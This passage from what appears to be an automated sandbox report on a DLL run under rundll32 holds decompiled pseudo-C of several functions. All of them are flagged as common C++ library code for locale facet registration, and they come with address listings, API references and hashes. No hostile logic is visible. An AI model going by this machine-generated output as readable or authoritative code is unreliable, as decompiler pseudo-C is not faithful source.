													 *_t150 = 0x6e26c0c4;
													 *((char*)(_t150 + 0x28)) =  *((intOrPtr*)(_t154 + 0x10));
													E6E21542F(_t110, _t131, _t141, _t145, _t150,  *_t49);
													return E6E220075(_t150,  *((intOrPtr*)(_t154 + 8)));
												} else {
													_t145 =  *(_t154 - 0x10);
													 *(_t154 - 0x10) = _t145;
													 *(_t154 - 4) = 1;
													E6E206FD3(__eflags, _t145);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4))))();
													 *0x6e2c6dd0 = _t145;
													goto L19;
												}
											} else {
												_t145 = _t149;
												goto L19;
											}
										}
									} else {
										_t144 =  *(_t154 - 0x10);
										 *(_t154 - 0x10) = _t144;
										 *(_t154 - 4) = 1;
										E6E206FD3(__eflags, _t144);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 4))))();
										 *0x6e2c6e00 = _t144;
										goto L12;
									}
								} else {
									_t144 = _t148;
									goto L12;
								}
							}
						} else {
							_t143 =  *(_t154 - 0x10);
							 *(_t154 - 0x10) = _t143;
							 *(_t154 - 4) = 1;
							E6E206FD3(__eflags, _t143);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 4))))();
							 *0x6e2c6dcc = _t143;
							goto L5;
						}
					} else {
						_t143 = _t147;
						goto L5;
					}
				}
			}















                          0x6e20fb3d
                          0x6e20fb3d
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb6e
                          0x6e20fb73
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20FB44
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20FB4E
                          • int.LIBCPMT ref: 6E20FB65
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20FB9F
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FBBF
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20FBDD
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: f50bdd13fb5bdfe652d8237c1e4b6903938cda211a126a7cd3015429943347f3
                          • Instruction ID: 78c16c7cfdeef293c5514b18c1c363ef952ffcb74cea5a6842a6c889fabdd728
                          • Opcode Fuzzy Hash: f50bdd13fb5bdfe652d8237c1e4b6903938cda211a126a7cd3015429943347f3
                          • Instruction Fuzzy Hash: 5611067690051E9BCF04DBE4C898AEEB77BAF48B14F240909E511AB2D0DBB49A45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20FBE3, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 75%
                          			E6E20FBE3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t42;
				void* _t54;
				signed int _t93;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;

				_t79 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t110 - 0x14, 0);
				_t105 =  *0x6e2c6e00; // 0x0
				 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
				 *(_t110 - 0x10) = _t105;
				_t41 = E6E1E161C(0x6e2c6dac);
				_t82 =  *((intOrPtr*)(_t110 + 8));
				_t42 = E6E1E171B( *((intOrPtr*)(_t110 + 8)), _t41);
				_t102 = _t42;
				if(_t42 != 0) {
					L5:
					E6E2066BA(_t110 - 0x14);
					return E6E220075(_t102);
				} else {
					if(_t105 == 0) {
						_push( *((intOrPtr*)(_t110 + 8)));
						_push(_t110 - 0x10);
						__eflags = E6E2115C4(__ebx, _t82, __edx, _t102, _t105) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t110 - 0x20);
							E6E223D74(_t110 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t102, _t105, 0x14);
							E6E206653(_t110 - 0x14, 0);
							_t106 =  *0x6e2c6dd0; // 0x0
							 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
							 *(_t110 - 0x10) = _t106;
							_t54 = E6E1E161C(0x6e2c6d60);
							_t89 =  *((intOrPtr*)(_t110 + 8));
							_t103 = E6E1E171B( *((intOrPtr*)(_t110 + 8)), _t54);
							__eflags = _t103;
							if(_t103 != 0) {
								L12:
								E6E2066BA(_t110 - 0x14);
								return E6E220075(_t103);
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									_push( *((intOrPtr*)(_t110 + 8)));
									_push(_t110 - 0x10);
									__eflags = E6E21162A(__ebx, _t89, __edx, _t103, _t106) - 0xffffffff;
									if(__eflags == 0) {
										_t93 = _t110 - 0x20;
										E6E1E1438(_t93);
										E6E223D74(_t110 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e26851f, _t79, _t103, _t106, 4);
										_t107 = _t93;
										 *(_t110 - 0x10) = _t107;
										 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t110 + 0xc));
										_push( *((intOrPtr*)(_t110 + 0x14)));
										_t35 = _t110 - 4;
										 *_t35 =  *(_t110 - 4) & 0x00000000;
										__eflags =  *_t35;
										 *_t107 = 0x6e26c0c4;
										 *((char*)(_t107 + 0x28)) =  *((intOrPtr*)(_t110 + 0x10));
										E6E21542F(_t79, _t93, __edx, _t103, _t107,  *_t35);
										return E6E220075(_t107,  *((intOrPtr*)(_t110 + 8)));
									} else {
										_t103 =  *(_t110 - 0x10);
										 *(_t110 - 0x10) = _t103;
										 *(_t110 - 4) = 1;
										E6E206FD3(__eflags, _t103);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 4))))();
										 *0x6e2c6dd0 = _t103;
										goto L12;
									}
								} else {
									_t103 = _t106;
									goto L12;
								}
							}
						} else {
							_t102 =  *(_t110 - 0x10);
							 *(_t110 - 0x10) = _t102;
							 *(_t110 - 4) = 1;
							E6E206FD3(__eflags, _t102);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
							 *0x6e2c6e00 = _t102;
							goto L5;
						}
					} else {
						_t102 = _t105;
						goto L5;
					}
				}
			}












                          0x6e20fbe3
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc14
                          0x6e20fc19
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20FBEA
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20FBF4
                          • int.LIBCPMT ref: 6E20FC0B
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20FC45
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FC65
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20FC83
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 5a8849c5b38dbda1ca21755790ce879d6de7a6c93fadb102331029b3e8d33d06
                          • Instruction ID: d1e7b642812f5fe2d79606500f628ac9fe5a98729226613b93c8deb2ffc433f1
                          • Opcode Fuzzy Hash: 5a8849c5b38dbda1ca21755790ce879d6de7a6c93fadb102331029b3e8d33d06
                          • Instruction Fuzzy Hash: 9311067590051D9BCF40DBE0C894EEEB77BBF44B14F240909E8106B2D0DFB49A44C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21B898, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E21B898(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t97;
				signed int _t98;
				void* _t110;
				void* _t123;
				void* _t136;
				void* _t149;
				void* _t162;
				signed int _t245;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t286;

				_t264 = __edx;
				_t203 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t286 - 0x14, 0);
				_t273 =  *0x6e2c6e30; // 0x0
				 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
				 *(_t286 - 0x10) = _t273;
				_t97 = E6E1E161C(0x6e2c6e10);
				_t206 =  *((intOrPtr*)(_t286 + 8));
				_t98 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t97);
				_t266 = _t98;
				if(_t98 != 0) {
					L5:
					E6E2066BA(_t286 - 0x14);
					return E6E220075(_t266);
				} else {
					if(_t273 == 0) {
						_push( *((intOrPtr*)(_t286 + 8)));
						_push(_t286 - 0x10);
						__eflags = E6E21C050(__ebx, _t206, __edx, _t266, _t273) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t286 - 0x20);
							E6E223D74(_t286 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t266, _t273, 0x14);
							E6E206653(_t286 - 0x14, 0);
							_t274 =  *0x6e2c6e34; // 0x0
							 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
							 *(_t286 - 0x10) = _t274;
							_t110 = E6E1E161C(0x6e2c6e14);
							_t213 =  *((intOrPtr*)(_t286 + 8));
							_t267 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t110);
							__eflags = _t267;
							if(_t267 != 0) {
								L12:
								E6E2066BA(_t286 - 0x14);
								return E6E220075(_t267);
							} else {
								__eflags = _t274;
								if(_t274 == 0) {
									_push( *((intOrPtr*)(_t286 + 8)));
									_push(_t286 - 0x10);
									__eflags = E6E21C0B8(_t203, _t213, __edx, _t267, _t274) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t286 - 0x20);
										E6E223D74(_t286 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t203, _t267, _t274, 0x14);
										E6E206653(_t286 - 0x14, 0);
										_t275 =  *0x6e2c6e3c; // 0x0
										 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
										 *(_t286 - 0x10) = _t275;
										_t123 = E6E1E161C(0x6e2c6e1c);
										_t220 =  *((intOrPtr*)(_t286 + 8));
										_t268 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t123);
										__eflags = _t268;
										if(_t268 != 0) {
											L19:
											E6E2066BA(_t286 - 0x14);
											return E6E220075(_t268);
										} else {
											__eflags = _t275;
											if(_t275 == 0) {
												_push( *((intOrPtr*)(_t286 + 8)));
												_push(_t286 - 0x10);
												__eflags = E6E21C120(_t203, _t220, __edx, _t268, _t275) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t286 - 0x20);
													E6E223D74(_t286 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t203, _t268, _t275, 0x14);
													E6E206653(_t286 - 0x14, 0);
													_t276 =  *0x6e2c6e38; // 0x0
													 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
													 *(_t286 - 0x10) = _t276;
													_t136 = E6E1E161C(0x6e2c6e18);
													_t227 =  *((intOrPtr*)(_t286 + 8));
													_t269 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t136);
													__eflags = _t269;
													if(_t269 != 0) {
														L26:
														E6E2066BA(_t286 - 0x14);
														return E6E220075(_t269);
													} else {
														__eflags = _t276;
														if(_t276 == 0) {
															_push( *((intOrPtr*)(_t286 + 8)));
															_push(_t286 - 0x10);
															__eflags = E6E21C1A4(_t203, _t227, _t264, _t269, _t276) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t286 - 0x20);
																E6E223D74(_t286 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t203, _t269, _t276, 0x14);
																E6E206653(_t286 - 0x14, 0);
																_t277 =  *0x6e2c6e40; // 0x0
																 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																 *(_t286 - 0x10) = _t277;
																_t149 = E6E1E161C(0x6e2c6e20);
																_t234 =  *((intOrPtr*)(_t286 + 8));
																_t270 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t149);
																__eflags = _t270;
																if(_t270 != 0) {
																	L33:
																	E6E2066BA(_t286 - 0x14);
																	return E6E220075(_t270);
																} else {
																	__eflags = _t277;
																	if(_t277 == 0) {
																		_push( *((intOrPtr*)(_t286 + 8)));
																		_push(_t286 - 0x10);
																		__eflags = E6E21C229(_t203, _t234, _t264, _t270, _t277) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t286 - 0x20);
																			E6E223D74(_t286 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t203, _t270, _t277, 0x14);
																			E6E206653(_t286 - 0x14, 0);
																			_t278 =  *0x6e2c6e44; // 0x0
																			 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																			 *(_t286 - 0x10) = _t278;
																			_t162 = E6E1E161C(0x6e2c6e24);
																			_t241 =  *((intOrPtr*)(_t286 + 8));
																			_t271 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t162);
																			__eflags = _t271;
																			if(_t271 != 0) {
																				L40:
																				E6E2066BA(_t286 - 0x14);
																				return E6E220075(_t271);
																			} else {
																				__eflags = _t278;
																				if(_t278 == 0) {
																					_push( *((intOrPtr*)(_t286 + 8)));
																					_push(_t286 - 0x10);
																					__eflags = E6E21C295(_t203, _t241, _t264, _t271, _t278) - 0xffffffff;
																					if(__eflags == 0) {
																						_t245 = _t286 - 0x20;
																						E6E1E1438(_t245);
																						E6E223D74(_t286 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e26851f, _t203, _t271, _t278, 4);
																						_t279 = _t245;
																						 *(_t286 - 0x10) = _t279;
																						 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t286 + 0xc));
																						_push( *((intOrPtr*)(_t286 + 0x14)));
																						_t91 = _t286 - 4;
																						 *_t91 =  *(_t286 - 4) & 0x00000000;
																						__eflags =  *_t91;
																						 *_t279 = 0x6e26c414;
																						 *((char*)(_t279 + 0x28)) =  *((intOrPtr*)(_t286 + 0x10));
																						E6E21D028(_t203, _t245, _t264, _t271, _t279,  *_t91);
																						return E6E220075(_t279,  *((intOrPtr*)(_t286 + 8)));
																					} else {
																						_t271 =  *(_t286 - 0x10);
																						 *(_t286 - 0x10) = _t271;
																						 *(_t286 - 4) = 1;
																						E6E206FD3(__eflags, _t271);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t271 + 4))))();
																						 *0x6e2c6e44 = _t271;
																						goto L40;
																					}
																				} else {
																					_t271 = _t278;
																					goto L40;
																				}
																			}
																		} else {
																			_t270 =  *(_t286 - 0x10);
																			 *(_t286 - 0x10) = _t270;
																			 *(_t286 - 4) = 1;
																			E6E206FD3(__eflags, _t270);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t270 + 4))))();
																			 *0x6e2c6e40 = _t270;
																			goto L33;
																		}
																	} else {
																		_t270 = _t277;
																		goto L33;
																	}
																}
															} else {
																_t269 =  *(_t286 - 0x10);
																 *(_t286 - 0x10) = _t269;
																 *(_t286 - 4) = 1;
																E6E206FD3(__eflags, _t269);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t269 + 4))))();
																 *0x6e2c6e38 = _t269;
																goto L26;
															}
														} else {
															_t269 = _t276;
															goto L26;
														}
													}
												} else {
													_t268 =  *(_t286 - 0x10);
													 *(_t286 - 0x10) = _t268;
													 *(_t286 - 4) = 1;
													E6E206FD3(__eflags, _t268);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
													 *0x6e2c6e3c = _t268;
													goto L19;
												}
											} else {
												_t268 = _t275;
												goto L19;
											}
										}
									} else {
										_t267 =  *(_t286 - 0x10);
										 *(_t286 - 0x10) = _t267;
										 *(_t286 - 4) = 1;
										E6E206FD3(__eflags, _t267);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
										 *0x6e2c6e34 = _t267;
										goto L12;
									}
								} else {
									_t267 = _t274;
									goto L12;
								}
							}
						} else {
							_t266 =  *(_t286 - 0x10);
							 *(_t286 - 0x10) = _t266;
							 *(_t286 - 4) = 1;
							E6E206FD3(__eflags, _t266);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
							 *0x6e2c6e30 = _t266;
							goto L5;
						}
					} else {
						_t266 = _t273;
						goto L5;
					}
				}
			}
























                          0x6e21b898
                          0x6e21b898
                          0x6e21b89f
                          0x6e21b8a9
                          0x6e21b8ae
                          0x6e21b8b9
                          0x6e21b8bd
                          0x6e21b8c0
                          0x6e21b8c5
                          0x6e21b8c9
                          0x6e21b8ce
                          0x6e21b8d2
                          0x6e21b917
                          0x6e21b91a
                          0x6e21b926
                          0x6e21b8d4
                          0x6e21b8d6
                          0x6e21b8dc
                          0x6e21b8e2
                          0x6e21b8ea
                          0x6e21b8ed
                          0x6e21b92a
                          0x6e21b938
                          0x6e21b93d
                          0x6e21b945
                          0x6e21b94f
                          0x6e21b954
                          0x6e21b95f
                          0x6e21b963
                          0x6e21b966
                          0x6e21b96b
                          0x6e21b974
                          0x6e21b976
                          0x6e21b978
                          0x6e21b9bd
                          0x6e21b9c0
                          0x6e21b9cc
                          0x6e21b97a
                          0x6e21b97a
                          0x6e21b97c
                          0x6e21b982
                          0x6e21b988
                          0x6e21b990
                          0x6e21b993
                          0x6e21b9d0
                          0x6e21b9de
                          0x6e21b9e3
                          0x6e21b9eb
                          0x6e21b9f5
                          0x6e21b9fa
                          0x6e21ba05
                          0x6e21ba09
                          0x6e21ba0c
                          0x6e21ba11
                          0x6e21ba1a
                          0x6e21ba1c
                          0x6e21ba1e
                          0x6e21ba63
                          0x6e21ba66
                          0x6e21ba72
                          0x6e21ba20
                          0x6e21ba20
                          0x6e21ba22
                          0x6e21ba28
                          0x6e21ba2e
                          0x6e21ba36
                          0x6e21ba39
                          0x6e21ba76
                          0x6e21ba84
                          0x6e21ba89
                          0x6e21ba91
                          0x6e21ba9b
                          0x6e21baa0
                          0x6e21baab
                          0x6e21baaf
                          0x6e21bab2
                          0x6e21bab7
                          0x6e21bac0
                          0x6e21bac2
                          0x6e21bac4
                          0x6e21bb09
                          0x6e21bb0c
                          0x6e21bb18
                          0x6e21bac6
                          0x6e21bac6
                          0x6e21bac8
                          0x6e21bace
                          0x6e21bad4
                          0x6e21badc
                          0x6e21badf
                          0x6e21bb1c
                          0x6e21bb2a
                          0x6e21bb2f
                          0x6e21bb37
                          0x6e21bb41
                          0x6e21bb46
                          0x6e21bb51
                          0x6e21bb55
                          0x6e21bb58
                          0x6e21bb5d
                          0x6e21bb66
                          0x6e21bb68
                          0x6e21bb6a
                          0x6e21bbaf
                          0x6e21bbb2
                          0x6e21bbbe
                          0x6e21bb6c
                          0x6e21bb6c
                          0x6e21bb6e
                          0x6e21bb74
                          0x6e21bb7a
                          0x6e21bb82
                          0x6e21bb85
                          0x6e21bbc2
                          0x6e21bbd0
                          0x6e21bbd5
                          0x6e21bbdd
                          0x6e21bbe7
                          0x6e21bbec
                          0x6e21bbf7
                          0x6e21bbfb
                          0x6e21bbfe
                          0x6e21bc03
                          0x6e21bc0c
                          0x6e21bc0e
                          0x6e21bc10
                          0x6e21bc55
                          0x6e21bc58
                          0x6e21bc64
                          0x6e21bc12
                          0x6e21bc12
                          0x6e21bc14
                          0x6e21bc1a
                          0x6e21bc20
                          0x6e21bc28
                          0x6e21bc2b
                          0x6e21bc65
                          0x6e21bc68
                          0x6e21bc76
                          0x6e21bc7b
                          0x6e21bc83
                          0x6e21bc88
                          0x6e21bc8a
                          0x6e21bc90
                          0x6e21bc93
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bca0
                          0x6e21bca6
                          0x6e21bca9
                          0x6e21bcb5
                          0x6e21bc2d
                          0x6e21bc2d
                          0x6e21bc30
                          0x6e21bc34
                          0x6e21bc38
                          0x6e21bc45
                          0x6e21bc4d
                          0x6e21bc4f
                          0x00000000
                          0x6e21bc4f
                          0x6e21bc16
                          0x6e21bc16
                          0x00000000
                          0x6e21bc16
                          0x6e21bc14
                          0x6e21bb87
                          0x6e21bb87
                          0x6e21bb8a
                          0x6e21bb8e
                          0x6e21bb92
                          0x6e21bb9f
                          0x6e21bba7
                          0x6e21bba9
                          0x00000000
                          0x6e21bba9
                          0x6e21bb70
                          0x6e21bb70
                          0x00000000
                          0x6e21bb70
                          0x6e21bb6e
                          0x6e21bae1
                          0x6e21bae1
                          0x6e21bae4
                          0x6e21bae8
                          0x6e21baec
                          0x6e21baf9
                          0x6e21bb01
                          0x6e21bb03
                          0x00000000
                          0x6e21bb03
                          0x6e21baca
                          0x6e21baca
                          0x00000000
                          0x6e21baca
                          0x6e21bac8
                          0x6e21ba3b
                          0x6e21ba3b
                          0x6e21ba3e
                          0x6e21ba42
                          0x6e21ba46
                          0x6e21ba53
                          0x6e21ba5b
                          0x6e21ba5d
                          0x00000000
                          0x6e21ba5d
                          0x6e21ba24
                          0x6e21ba24
                          0x00000000
                          0x6e21ba24
                          0x6e21ba22
                          0x6e21b995
                          0x6e21b995
                          0x6e21b998
                          0x6e21b99c
                          0x6e21b9a0
                          0x6e21b9ad
                          0x6e21b9b5
                          0x6e21b9b7
                          0x00000000
                          0x6e21b9b7
                          0x6e21b97e
                          0x6e21b97e
                          0x00000000
                          0x6e21b97e
                          0x6e21b97c
                          0x6e21b8ef
                          0x6e21b8ef
                          0x6e21b8f2
                          0x6e21b8f6
                          0x6e21b8fa
                          0x6e21b907
                          0x6e21b90f
                          0x6e21b911
                          0x00000000
                          0x6e21b911
                          0x6e21b8d8
                          0x6e21b8d8
                          0x00000000
                          0x6e21b8d8
                          0x6e21b8d6

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21B89F
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21B8A9
                          • int.LIBCPMT ref: 6E21B8C0
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E21B8FA
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21B91A
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21B938
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
